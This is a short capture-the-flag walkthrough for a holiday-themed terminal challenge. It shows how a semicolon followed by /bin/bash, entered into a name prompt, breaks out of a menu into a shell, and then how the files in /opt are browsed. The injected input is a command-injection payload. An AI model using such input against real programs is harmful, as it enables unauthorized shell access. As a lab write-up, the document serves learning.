Solution: select name badge function (4) and escape the command with a semicolon, followed by /bin/bash to open shell

Enter choice [1 - 5] 4
Enter your name (Please avoid special characters, they cause some weird errors)...; /bin/bash
 _______________________
< Santa's Little Helper >
 -----------------------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||

   ___                                                      _    
  / __|   _  _     __      __      ___     ___     ___     | |   
  \__ \  | +| |   / _|    / _|    / -_)   (_-<    (_-<     |_|   
  |___/   \_,_|   \__|_   \__|_   \___|   /__/_   /__/_   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 

Type 'exit' to return to the menu.

From here we can read the contents of welcome.sh
Files are stored in /opt

shinny@477dce5efadf:/$ ls /opt -la
total 36
drwxr-xr-x 1 root root 4096 Dec  6 12:26 .
drwxr-xr-x 1 root root 4096 Dec 11 15:05 ..
-rw-r--r-- 1 root root 2730 Dec  5 00:00 castlemap.txt
-rw-r--r-- 1 root root 1896 Nov 29 13:36 coc.md
-rw-r--r-- 1 root root  481 Dec  3 21:22 directory.txt
-rw-r--r-- 1 root root  204 Dec  1 19:17 mailbox.txt
-rw-r--r-- 1 root root   79 Dec  1 19:17 plant.txt
-rw-r--r-- 1 root root  203 Dec  1 19:17 reindeer.cow
-rw-r--r-- 1 root root  433 Dec  1 19:17 success.txt

Are these significant?
shinny@477dce5efadf:/opt$ cat mailbox.txt 
      _________
    .`.        `.
   /   \ .======.\
   |   | |______||
   |   |   _____ |
   |   |  /    / |
   |   | /____/  |
   | _ |         |
   |/ \|.-"```"-.|
   `` |||      |||
jgs   `

shinny@477dce5efadf:/opt$ cat plant.txt
  Hi, my name is Jason the Plant!

  ( U
   \| )
  __|/
  \    /
   \__/ ejm96


There is /home/elf/runtoanswer but what is the question?